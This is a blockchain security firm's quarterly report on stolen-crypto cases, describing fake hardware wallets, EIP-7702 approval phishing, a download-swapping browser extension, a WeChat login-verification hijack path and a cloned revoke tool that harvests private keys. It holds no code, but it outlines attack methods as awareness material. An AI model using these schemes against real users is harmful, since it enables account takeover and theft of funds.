SlowMist: 2025 Q2 MistTrack Stolen Funds Analysis
Author: Lisa
Editor: Sherry
Since SlowMist launched the MistTrack stolen fund report submission feature, we have received a large number of help requests from victims every day, seeking support for fund tracing and recovery. Among them are cases involving losses of over tens of millions of USD.
Based on this, we have launched this quarterly series to collect statistics and conduct analysis on the stolen fund reports we receive, aiming to dissect both common and uncommon attack methods through real (anonymized) cases. The goal is to help industry participants better understand and guard against security risks, and to protect their assets.
According to statistics, the MistTrack Team received a total of 429 stolen fund reports in Q2 2025, including 278 domestic submissions and 151 overseas submissions. We provided free community-level assessment services for all of these cases.
(Ps. This data only includes cases submitted via the form, and does not cover those reported via email or other channels.)
In Q2, the MistTrack Team assisted 11 victims in successfully freezing or recovering approximately $11.95 million in stolen assets.
Causes of Theft
Among all malicious tactics observed in Q2 2025, phishing became the top cause of stolen assets. Next, we’ll walk through several representative cases to help everyone better avoid traps, prevent theft, and protect their assets.
1. Fake Hardware Wallets
This quarter, we encountered several asset theft incidents related to hardware wallets. Almost all of the victims believed they had taken sufficient security measures, but there were fatal vulnerabilities in their actual operations.
For instance, one victim contacted the SlowMist security team and reported that they had purchased a tampered cold wallet from Douyin (TikTok China), which led to the theft of approximately $6.5 million in crypto assets.
In another similar case, a user purchased a hardware wallet from an e-commerce platform, which came with complete packaging and a user manual. The attacker had pre-activated the device and obtained the mnemonic phrase, then repackaged the wallet and included a fake manual before selling it through unofficial channels. As soon as the user scanned the QR code in the manual to activate the wallet and transferred assets to the wallet address, the funds were immediately drained — following the standard asset theft process associated with fake wallets.
There was also a case where someone received a “prize giveaway” cold wallet. The attacker posed as a well-known manufacturer on social media and mailed cold wallet devices for free under the pretense of “lottery draws” or “airdrops.” Although the device appeared brand new and factory-sealed, and the seal looked intact, the user followed the included “manual” and entered the mnemonic phrase — without ever realizing that the device was a preconfigured phishing trap.
Some attackers even leveraged personal information leaked in previous data breaches to fabricate “official notification letters,” which were sent to users along with an “upgraded hardware wallet.” The letter claimed that the user’s original device had security vulnerabilities and instructed them to migrate their mnemonic phrase to the new “secure device.”
These replacement devices often came with pre-installed malicious firmware or guided users to input their mnemonic phrase into fake software. Once the migration was completed, the attackers immediately transferred the assets out.
In summary, the problem doesn’t really lie with cold wallets themselves, but rather with the widespread lack of awareness among users regarding how to verify the authenticity of hardware wallets, the secure initialization process, and common attack methods. Many users fall victim to these scams under the illusion of “apparent security,” assuming that using a cold wallet means complete safety — when in fact, this is just another form of social engineering.
2. EIP-7702 Phishing
In Q2, a new phishing technique emerged that exploits EIP-7702. In one case, a user was targeted by the Inferno Drainer group while interacting with EIP-7702 authorization, resulting in a loss of over $140,000.
The attacker’s method was not technically complex, but it did show some “creativity.” In this case, the user’s EOA address was not replaced with an EIP-7702 contract address via traditional phishing. In fact, the delegated address was not a phishing address at all — it was a legitimate contract that had existed for several days:
MetaMask: EIP-7702 Delegator (0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B).
The phishing scheme abused mechanisms within the MetaMask EIP-7702 Delegator, enabling the attacker to carry out bulk token approval operations tied to the victim’s address — eventually draining the assets.
What made this phishing method so effective lies in the delegation mechanism introduced by EIP-7702 — it allows a user’s EOA address to inherit the behavior of a contract once delegated (such as batch transfers, mass approvals, gas abstraction, etc.). If the user delegates their address to a malicious contract, it introduces obvious risks. However, even if the contract itself is legitimate, a phishing site may still abuse the delegated capabilities, leading to asset loss.
EIP-7702 certainly brings new possibilities for wallet functionality, but with those capabilities come new boundaries of risk. Before signing anything, users should strive for “what you see is what you sign” — and always be clear on who you’re authorizing and what they’re allowed to do.
For more on how to mitigate risks associated with EIP-7702, refer to our earlier article: “In-Depth Discussion on EIP-7702 and Best Practices.”
3. Malicious Browser Extensions
In Q2, we observed a particularly stealthy attack vector — browser extensions masquerading as security plugins. One such Chrome extension reported to us was called “Osiris”. After an in-depth investigation, we confirmed that although it claimed to detect phishing links and suspicious websites, it exhibited clear signs of phishing itself.
Attackers typically promoted this extension on social platforms using educational or “security recommendation” content, tricking users into installing it voluntarily. Once installed, the extension leveraged a browser interface to fetch network interception rules from a remote attacker-controlled server. We discovered that these rules were specifically designed to intercept all downloads of .exe, .dmg, .zip, and similar file types. It would then silently replace the user’s intended downloads with malicious programs.
Even more insidiously, attackers would guide users to visit well-known, commonly used websites like Notion or Zoom. When the user attempted to download software from these official sites, the files delivered had already been maliciously replaced — yet the browser still displayed the download as originating from the legitimate source, making it nearly impossible for users to spot anything suspicious.
The malicious payloads collected sensitive information from the victim’s computer — including local Chrome browser data and macOS Keychain credentials — and uploaded them to the attacker’s server. From there, attackers could extract seed phrases, private keys, or login credentials, enabling them to steal crypto assets and potentially hijack exchange accounts, social media profiles, and more.
Recommendations:
- Avoid installing browser extensions or applications recommended by strangers — even if they appear “official”.
- Regularly audit and remove unused or suspicious extensions.
- Consider using reputable extension managers or antivirus tools to improve detection and protection.
4. WeChat Account Hijacking
In Q2, we received numerous reports from users whose WeChat accounts had been compromised. After gaining control of an account, attackers would impersonate the user and scam their contacts with offers to buy USDT at discounted prices — resulting in financial losses for friends and acquaintances. In more serious cases, the attackers even changed the account password, silently taking full control.
Unlike traditional on-chain security risks, this type of attack exploits the trust relationships inherent in social platforms.
We have not yet definitively confirmed how these hijackings occur, but testing and user feedback suggest a possible path:
- The attacker obtains the victim’s WeChat username and password, likely due to credential leaks from other platforms, reused passwords, or brute-force attacks.
- When logging in from an unfamiliar device, WeChat triggers a secondary verification process, one option being to ask a “frequent contact” to verify the login.
- Our testing revealed that WeChat’s definition of “frequent contact” is quite broad — sometimes just being in the same group chat or having sent a few messages can qualify.
- If the attacker had previously added the victim as a contact and waited patiently, they could initiate the login at night or while the user is offline — and request the “co-conspirator contact” to approve the login. This significantly increases the chance of a successful hijack.
While this scenario remains speculative, it highlights an important point: Web3 users’ security boundaries now extend beyond the chain — into social networks and contact circles.
5. Social Engineering Attacks
We were also contacted in Q2 by a user reporting an issue with an irrevocable “risky authorization” in their wallet. They had attempted multiple times to revoke the approval, but to no avail. Believing it might be tied to a past token swap, they reached out to SlowMist for help.
Using common explorers and revoke tools, we couldn’t locate the authorization they referred to. Later, the user shared another screenshot — but we noticed the wallet address had changed. We asked them to send over the URL of the tool they used for checking, and that’s when we uncovered the problem.
The site, called Signature Checker (signature[.]land), was a near-perfect clone of the popular Revoke Cash interface — including a deceptively similar logo. However, this site asked users to input their private key to “check for risky signatures”, which is a clear phishing red flag.
We tested the site with various addresses. No matter which address we entered, it always showed recent “risky approvals” and warned that urgent revocation was needed — creating a false sense of urgency. Even when entering a fake private key with formatting errors, the site still submitted the data via a network request.
Upon analyzing the frontend code, we confirmed that this phishing website used EmailJS to send users’ input — including private keys and addresses — to an attacker’s email inbox. It also called the Etherscan API to check if addresses were valid, enhancing its appearance of legitimacy.
And how did the victim even find this site? It all started with a comment or private message on a social platform, saying something like:
“You signed a phishing transaction. Please cancel the authorization immediately.” followed by a link to the fake tool.
What’s worse, when the user became suspicious, the attacker impersonated a SlowMist employee in an attempt to perform a second round of social engineering. This was no ordinary phishing scam — it was a carefully staged setup.
These social engineering attacks are not technically sophisticated, but they excel at exploiting urgency and trust. Attackers know that phrases like “risky signature detected” can trigger panic, prompting users to take hasty actions. Once that emotional state is triggered, it’s much easier to manipulate them into doing things they normally wouldn’t — like clicking links or sharing sensitive information.
Final Thoughts
Looking back on Q2, one trend stands out: attackers’ methods may not be getting technically more advanced, but they are becoming more psychologically manipulative. We’re seeing a clear shift from purely on-chain attacks to off-chain entry points — browser extensions, social media accounts, authentication flows, and user behavior are all becoming common attack surfaces. Ultimately, regardless of how technology evolves, two principles remain timeless:
- Maintain skepticism and verify everything.
- Treat every authorization or signature as unlocking a door — make sure you know who’s on the other side.
We also strongly recommend re-reading the Blockchain Dark Forest Selfguard Handbook. This guide is not just about surviving attacks — it’s about understanding the mindset needed to avoid becoming prey in a digital jungle.
If you’ve fallen victim to cryptocurrency theft, we offer free community assistance to help evaluate your case. Simply submit the appropriate form based on the incident type (stolen funds, scam, or extortion). The hacker’s address you provide will also be shared with SlowMist InMist Lab’s Threat Intelligence Network for further risk control actions.
- Submit the Chinese form here: https://aml.slowmist.com/cn/recovery-funds.html
- Submit the English form here: https://aml.slowmist.com/recovery-funds.html
SlowMist has been deeply involved in the Anti-Money Laundering (AML) field for many years, developing a comprehensive and efficient solution that covers compliance, investigations, and audits. We are committed to fostering a healthy cryptocurrency ecosystem and providing professional services to the Web3 industry, financial institutions, regulatory bodies, and compliance departments. Our MistTrack platform offers compliance investigation services that include wallet address analysis, fund monitoring, and tracing. To date, MistTrack has accumulated over 300 million address tags, more than 1,000 address entities, 500,000+ threat intelligence data points, and 90 million+ risk addresses, providing strong protection against money laundering and ensuring digital asset security.
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
